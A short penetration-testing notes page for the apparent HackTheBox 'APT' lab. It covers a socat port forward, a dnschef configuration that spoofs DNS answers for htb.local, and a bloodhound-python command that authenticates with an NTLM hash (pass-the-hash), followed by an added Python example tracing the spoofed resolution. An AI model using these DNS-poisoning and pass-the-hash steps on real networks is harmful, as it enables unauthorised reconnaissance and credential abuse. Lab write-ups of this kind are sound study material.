SOCAT to redirect ports

In cases where a domain is reachable on its IPv6 ports but not on IPv4, BloodHound ingestors will still send DNS queries for A records, which only carry IPv4 addresses. Use dnschef to poison the responses: set up the msdcs records for the domain, and use A records to point the DC and GC to 127.0.0.1. Then use socat to forward traffic on the ports to the IPv6 address.

sudo socat TCP-LISTEN:389,fork TCP:apt:389

DNSCHEF INI

[A]
apt.htb.local=127.0.0.1

[AAAA]
apt=dead:beef::b885:d62a:d679:573f
htb=dead:beef::b885:d62a:d679:573f
htb.local=dead:beef::b885:d62a:d679:573f
apt.htb.local=dead:beef::b885:d62a:d679:573f

[SRV]
*.*.htb.local=0 5 389 apt.htb.local

bloodhound-python -u 'henry.vinson' -c all -d htb.local -dc apt.htb.local -gc apt.htb.local --hashes :e53d87d42adaa3ca32bdb34a876cbffb -ns 127.0.0.1 --zip
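
To make the resolution chain that this configuration sets up explicit, the following added example (not part of the original page) parses the INI above and traces an SRV lookup to the loopback A record and on to the IPv6 address that socat forwards to. The wildcard-matching rule and the function names are assumptions made for the example; `forward_host` is the host name given to socat above.

```python
import configparser
import ipaddress

# The dnschef INI from this page, embedded so the example runs offline.
DNSCHEF_INI = """
[A]
apt.htb.local=127.0.0.1
[AAAA]
apt=dead:beef::b885:d62a:d679:573f
htb=dead:beef::b885:d62a:d679:573f
htb.local=dead:beef::b885:d62a:d679:573f
apt.htb.local=dead:beef::b885:d62a:d679:573f
[SRV]
*.*.htb.local=0 5 389 apt.htb.local
"""

def load(text):
    # '=' is the only delimiter, so the colons in IPv6 values are left alone.
    cp = configparser.ConfigParser(delimiters=("=",), interpolation=None)
    cp.read_string(text)
    return {section: dict(cp[section]) for section in cp.sections()}

def lookup(records, qname):
    # Assumption: patterns match label by label and '*' covers exactly one label.
    q = qname.lower().rstrip(".").split(".")
    for pattern, value in records.items():
        p = pattern.split(".")
        if len(p) == len(q) and all(a in ("*", b) for a, b in zip(p, q)):
            return value
    return None

def trace(cfg, srv_qname, forward_host="apt"):
    """Follow SRV -> A for the client, then AAAA for the name given to socat."""
    srv = lookup(cfg.get("SRV", {}), srv_qname)
    if srv is None:
        return None
    _priority, _weight, port, target = srv.split()
    ipv4 = lookup(cfg.get("A", {}), target)
    ipv6 = lookup(cfg.get("AAAA", {}), forward_host)
    return {
        "target": target,
        "port": int(port),
        "ipv4": ipv4,
        "loopback": bool(ipv4) and ipaddress.ip_address(ipv4).is_loopback,
        "forward_to": str(ipaddress.IPv6Address(ipv6)) if ipv6 else None,
    }

if __name__ == "__main__":
    print(trace(load(DNSCHEF_INI), "_ldap._tcp.htb.local"))
```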
